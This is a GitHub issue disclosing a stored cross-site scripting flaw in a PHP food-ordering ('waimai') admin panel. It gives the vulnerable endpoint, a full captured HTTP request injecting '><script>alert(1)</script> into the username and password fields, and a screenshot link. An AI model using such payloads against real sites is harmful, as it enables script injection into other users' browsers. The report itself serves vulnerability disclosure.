Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
0x01 Presence address POST /waimai/admin.php?m=Member&a=adminaddsave
0x02 data pack POST /waimai/admin.php?m=Member&a=adminaddsave HTTP/1.1 Host: localhost:88 Content-Length: 412 Cache-Control: max-age=0 Origin: http://localhost:88 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12EpjMi6RL4SqCWi Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Referer: http://localhost:88/waimai/admin.php?m=Member&a=adminadd Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: _pendo_meta.77c79869-0135-481b-7c93-53f43e8ae3d8=1241925494; __tins__16868462=%7B%22sid%22%3A%201546794316294%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201546796116294%7D; 51cke=; 51laig=1; PHPSESSID=hclfhhk6pd5rs06kh79je9emh7X Connection: close
------WebKitFormBoundary12EpjMi6RL4SqCWi Content-Disposition: form-data; name="username"
'><script>alert(1)</script> ------WebKitFormBoundary12EpjMi6RL4SqCWi Content-Disposition: form-data; name="password"
'><script>alert(1)</script> ------WebKitFormBoundary12EpjMi6RL4SqCWi
Content-Disposition: form-data; name="repassword"
'><script>alert(1)</script> ------WebKitFormBoundary12EpjMi6RL4SqCWi--
0x03 Proof screenshot 截图见: https://i.loli.net/2019/01/07/5c32e807db503.png
The text was updated successfully, but these errors were encountered:
No branches or pull requests
0x01 Presence address
POST /waimai/admin.php?m=Member&a=adminaddsave
0x02 data pack
POST /waimai/admin.php?m=Member&a=adminaddsave HTTP/1.1
Host: localhost:88
Content-Length: 412
Cache-Control: max-age=0
Origin: http://localhost:88
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12EpjMi6RL4SqCWi
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: http://localhost:88/waimai/admin.php?m=Member&a=adminadd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _pendo_meta.77c79869-0135-481b-7c93-53f43e8ae3d8=1241925494; __tins__16868462=%7B%22sid%22%3A%201546794316294%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201546796116294%7D; 51cke=; 51laig=1; PHPSESSID=hclfhhk6pd5rs06kh79je9emh7X
Connection: close
------WebKitFormBoundary12EpjMi6RL4SqCWi
Content-Disposition: form-data; name="username"
'><script>alert(1)</script>
------WebKitFormBoundary12EpjMi6RL4SqCWi
Content-Disposition: form-data; name="password"
'><script>alert(1)</script>
------WebKitFormBoundary12EpjMi6RL4SqCWi
Content-Disposition: form-data; name="repassword"
'><script>alert(1)</script>
------WebKitFormBoundary12EpjMi6RL4SqCWi--
0x03 Proof screenshot
截图见:
https://i.loli.net/2019/01/07/5c32e807db503.png
The text was updated successfully, but these errors were encountered: